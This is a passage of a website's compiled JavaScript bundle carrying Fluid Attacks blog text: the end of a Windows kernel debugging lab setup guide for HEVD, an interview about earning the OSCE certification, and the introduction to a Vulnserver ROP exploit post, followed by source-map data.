1024w,https://framerusercontent.com/images/kPO7nw96heOFWse7159o1PBc4.png 1920w\",style:{aspectRatio:\"1920 / 631\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"On \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\", type \",/*#__PURE__*/e(\"code\",{children:\".reload\"})]}),/*#__PURE__*/t(\"ul\",{style:{\"--framer-text-alignment\":\"start\",\"--framer-text-color\":\"rgb(0, 0, 0)\",\"--framer-text-stroke-width\":\"0px\",\"--framer-text-transform\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"Type \",/*#__PURE__*/e(\"code\",{children:\"lm m HEVD\"}),\" to check if the \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" module is 
loaded.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",style:{\"--framer-font-size\":\"16px\",\"--framer-text-color\":\"rgb(83, 83, 101)\"},children:/*#__PURE__*/t(\"p\",{children:[\"And type \",/*#__PURE__*/e(\"code\",{children:\"x HEVD!*\"}),\" to check if the symbols were successfully added.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"HEVD symbols gif\",className:\"framer-image\",height:\"287\",src:\"https://framerusercontent.com/images/GiggVRo6V4X0cfnTz62s9kRErI.gif\",srcSet:\"https://framerusercontent.com/images/GiggVRo6V4X0cfnTz62s9kRErI.gif?scale-down-to=512 512w,https://framerusercontent.com/images/GiggVRo6V4X0cfnTz62s9kRErI.gif?scale-down-to=1024 1024w,https://framerusercontent.com/images/GiggVRo6V4X0cfnTz62s9kRErI.gif 1228w\",style:{aspectRatio:\"1228 / 574\"},width:\"614\"}),/*#__PURE__*/e(\"p\",{children:\"With that, we can start debugging our target machine\u2019s kernel space!\"}),/*#__PURE__*/e(\"img\",{alt:\"\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/iwuvZ4ytXTtuMvHMor3P9oVU.png\",srcSet:\"https://framerusercontent.com/images/iwuvZ4ytXTtuMvHMor3P9oVU.png?scale-down-to=512 512w,https://framerusercontent.com/images/iwuvZ4ytXTtuMvHMor3P9oVU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/iwuvZ4ytXTtuMvHMor3P9oVU.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"In the \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-dos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"next post\"})}),\", you can see a short reference of \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" commands that we will be using during this process.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[\"This post will help you set up a working Windows Kernel debugging lab. 
In the next posts we will be dealing with some theory on Windows Kernel and will start \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-dos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"exploiting HEVD\"})}),\".\"]})]});export const richText7=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"img\",{alt:\"Roldan's certification\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/MV7BT7McKTMD05tJW4mxV3EIvI.png\",srcSet:\"https://framerusercontent.com/images/MV7BT7McKTMD05tJW4mxV3EIvI.png?scale-down-to=512 512w,https://framerusercontent.com/images/MV7BT7McKTMD05tJW4mxV3EIvI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/MV7BT7McKTMD05tJW4mxV3EIvI.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"A few days ago, Fluid Attacks' Offensive Team Leader \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/authors/andres-roldan/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Andres Roldan\"})}),\", published a blog post about his '\",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/osce-journey/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Journey to OSCE\"})}),\".' After reading it and showing more interest in his experience, we had some questions, which Andres was kind enough to answer. Here we share with you some of his insights:\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Why do you think you gravitated to the issues of hacking and cybersecurity initially?\"})}),/*#__PURE__*/e(\"p\",{children:\"I\u2019ve always been curious about how things work. 
In college, while studying Business Administration, some 20 years ago, I once read or heard the word 'Hacker' and started reading about what it meant to be a hacker and what skills were required. At that time, Windows 98 was in use, and terms like 'hacker,' 'cracker,' and 'phreaker' were popular. Besides, Kevin Mitnick was an idol, and the movies Matrix and Takedown were released. That atmosphere of deep knowledge was what led me to change careers and start on the path of cybersecurity.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Why did you read Aleph One\u2019s article about exploitation if you didn\u2019t know anything about computers?\"})}),/*#__PURE__*/e(\"p\",{children:\"If you searched in Altavista (the Google of 20 years ago) for terms related to 'hacking,' that was one of the results. That article was launched in Phrack magazine, which is still a reference point for security issues.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"How and when did you discover Fluid Attacks? What were the requirements to fulfill at that time to become part of the company?\"})}),/*#__PURE__*/e(\"p\",{children:\"Before Fluid Attacks, I had a cybersecurity company, but it was not successful. Fluid Attacks was created by some friends in 2001. When they found out that my company was closed, they interviewed me and asked me about my knowledge. By that time (ending 2002), the experience I had acquired (in Linux, security, and hacking) by studying on my own was enough to get me into Fluid Attacks.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What kind of skills and knowledge do you think a person should possess to achieve this OSCE certification?\"})}),/*#__PURE__*/e(\"p\",{children:\"The CTP course is designed to help you think in a creative way when you are doing an intrusion. 
Knowledge is gained through study and discipline, but the key is the ability to think outside the box to resolve problems.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"You told us that you did the CTP course modules several times. Why did you do that?\"})}),/*#__PURE__*/e(\"p\",{children:\"Because there are many variables to take into account when creating an exploit. You have to understand every step, every instruction, and why. Every application is different, and you can\u2019t apply 'by heart' attack patterns. You have to understand the reason for each step, and that is accomplished by repetition.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What is it that changes so much between the laboratory in the course and the exam?\"})}),/*#__PURE__*/e(\"p\",{children:\"The techniques to solve the exam are taught in the course. However, the exam exercises are not solved in the same way as the course exercises. It is necessary to understand the problem, understand the target\u2019s environment, and reuse what has been learned creatively.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"How does the 'Hack The Box' machines' difficulty level compare to these lab and test exercises?\"})}),/*#__PURE__*/e(\"p\",{children:\"Hack The Box machines do a great job making you think out-of-the-box. These machines use different techniques, commonly employed on CTF challenges, but are uncommon in the real world. On the other hand, the CTP course has exercises to exploit real applications and real vulnerabilities using fuzzing and reverse engineering techniques and focused on finding 0-days.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Which were the most complex challenges in the exam?\"})}),/*#__PURE__*/e(\"p\",{children:\"Due to Offensive Security certification policies, students can\u2019t talk much about the exam details. 
However, all of the exam points are not straightforward. You have to really understand what\u2019s going on before attempting to create a solution for the challenge. Reading the objectives in detail for each exam point will give you a better understanding of how to approach the solution.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What would you recommend to those who want to obtain this certification?\"})}),/*#__PURE__*/t(\"p\",{children:[\"As I mentioned in \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/osce-journey/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"the blog post\"})}),\", you should perform extra self-training after the CTP course. I, for instance, exploited several known vulnerabilities from scratch, using my methods and exploits. Furthermore, although it\u2019s not required to have the OSCP certification to obtain the OSCE, I strongly recommend it. Offensive Security certifications are meant to be hard, and having experience with other certifications before OSCE will be an advantage.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Regarding certificates, what is the next goal you have in mind?\"})}),/*#__PURE__*/e(\"p\",{children:\"The current version of OSCE certification will disappear this year. It will be replaced by 2 different certifications that, along with OSWE, would be a new OSCE. However, those 2 new certifications are not ready yet. For now, I already have a spot for the Advanced Windows Exploitation course that will take place in London in April 2021. That is the course required before attempting to obtain the OSEE certification, which is regarded as the most difficult exploitation certification in the world.\"}),/*#__PURE__*/t(\"p\",{children:[\"Thanks to Andres for sharing about his achievement. 
\",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/osce-journey/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"Here\"})}),\" you can read the previous post about his experience with OSCE, and if you want to know more about the certifications that the members of our \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/red-team-exercise/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"red team\"})}),\" have obtained, you can follow \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/certifications/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"this link\"})}),\".\"]})]});export const richText8=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"In the last blog posts, we\u2019ve been \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/understanding-dep/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"dealing with DEP\"})}),\" (Data Execution Protection) and a way to \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/bypassing-dep/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"bypass it with ROP\"})}),\" (Return-Oriented Programming). 
If you haven\u2019t read those articles, I strongly recommend it before diving into this one.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In this article, we will use \",/*#__PURE__*/e(\"code\",{children:\"ROP\"}),\" to create a fully working exploit for the \",/*#__PURE__*/e(\"code\",{children:\"TRUN\"}),\" command of Vulnserver on a DEP-enabled Windows 10 OS.\"]})]});\nexport const __FramerMetadata__ = {\"exports\":{\"richText3\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText8\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText6\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText1\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText7\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText4\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText5\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText2\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"__FramerMetadata__\":{\"type\":\"variable\"}}}"],
  "mappings": "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
